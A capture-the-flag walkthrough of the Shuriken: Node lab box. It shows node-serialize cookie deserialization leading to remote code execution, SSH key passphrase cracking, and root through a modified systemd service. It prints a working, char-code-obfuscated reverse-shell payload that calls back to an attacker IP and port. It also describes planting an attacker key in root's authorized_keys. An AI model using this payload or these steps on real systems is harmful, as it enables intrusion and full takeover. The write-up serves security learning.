systemweakness.com

SHURIKEN: NODE — Walkthrough

Ayush Shah

This is a super fantastic box built by TheCyb3rW0lf. After the last breach, The Shuriken Company decided to move and rebuild its infrastructure. This time using different technology, and assuring us it’s gonna be secure. Will it be so? It’s up to you to prove otherwise.

As always, I spun up nmap first.

From the above screenshot, we can note the open ports, 22 and 8080. 22 is SSH and 8080 is running a Node application. Then I began with the nmap default script scan.

Then I moved to inspect the web page.

The web page is static; it doesn’t have any links when clicking on the page titles, but what really caught my eye was “Welcome, Guest”. I started questioning myself: how does it authenticate me as a Guest user? First I looked at the cookies; the web page sets a Guest cookie by default whenever a user visits. The web page is using jwt to generate the cookie.

I tried to decode that cookie and got this.

I changed my username using a base64 encoder.

We can set the value of username, so I thought it was worth trying SSTI; I began with a basic injection payload like ${7*7}.

It didn’t seem to work; the web application is sanitizing the bad characters. Then I assumed for a while that it was decoding the base64 cookie, so I tried with the payload only, removing everything except my basic payload.

I swapped my cookie and got an error.

At first glance you might think you are failing, but remember one thing: an error message tells you many things that can really help. If you look at the third line of the error, you will notice it’s serializing and unserializing the cookie object.

 at Object.exports.unserialize (/home/web/shuriken-node/node_modules/node-serialize/lib/serialize.js:62:16)

I was very happy, and finally I went to Google to find a way to exploit this serialization.

This POC is perfect. Remember to download this Python script to generate the payload: https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py

And that’s not all: you have to put this payload in the object like this and convert it into base64.

{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,50,46,49,55,49,34,59,10,80,79,82,84,61,34,52,52,52,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))
}()"
}

Grab the base64-encoded string, replace the cookie with it, and remember to start a nc listener on your local machine.

Good, we have a shell now; let’s begin by enumerating the entire system. First, I checked whether there were any backup files available.

We can notice that there are passwd.bak and shadow.bak along with ssh-backup.zip. Unfortunately, the passwd and shadow files are not readable by the user we have a shell as. So I copied ssh-backup.zip into the /tmp directory and unzipped it.

We have the private key of the serv-adm user, another user on the box. We have to get the key’s passphrase, which we can do using ssh2john.py; let’s do it.

Hurray! We have the passphrase; now we can log in as the serv-adm user with the private key.

I checked whether I could run anything as root; I typed sudo -l.

We can start, stop and reload this service. Now we have to find it on the system.

We can easily locate files using the find command on Linux.

If we list all the timers on the system, we get the following.

It’s triggering shuriken-job.service, which we can locate using the find command. Unfortunately, I couldn’t get a shell through bash somehow, so I decided to generate id_rsa.pub in the .ssh/ directory.

Then I modified the shuriken-job.service file: first, it will make the .ssh/ directory in /root if it doesn’t exist, while if it does, it will download id_rsa.pub from my web server and write it into .ssh/authorized_keys. I had already set up my python3 web server.

After doing all this, I stopped, reloaded and started the service again.

Actually, when I ran the start command it hit my web server.

At that point I assumed the key had been downloaded into /root/.ssh/, so I tried to log in over SSH, and we successfully rooted the box.

Done! This box was really awesome and a headache; I spent many hours understanding the web technology. Don’t forget the hint: see what technology the web app uses and how it processes user input.

Thank you for reading.

Happy Hacking!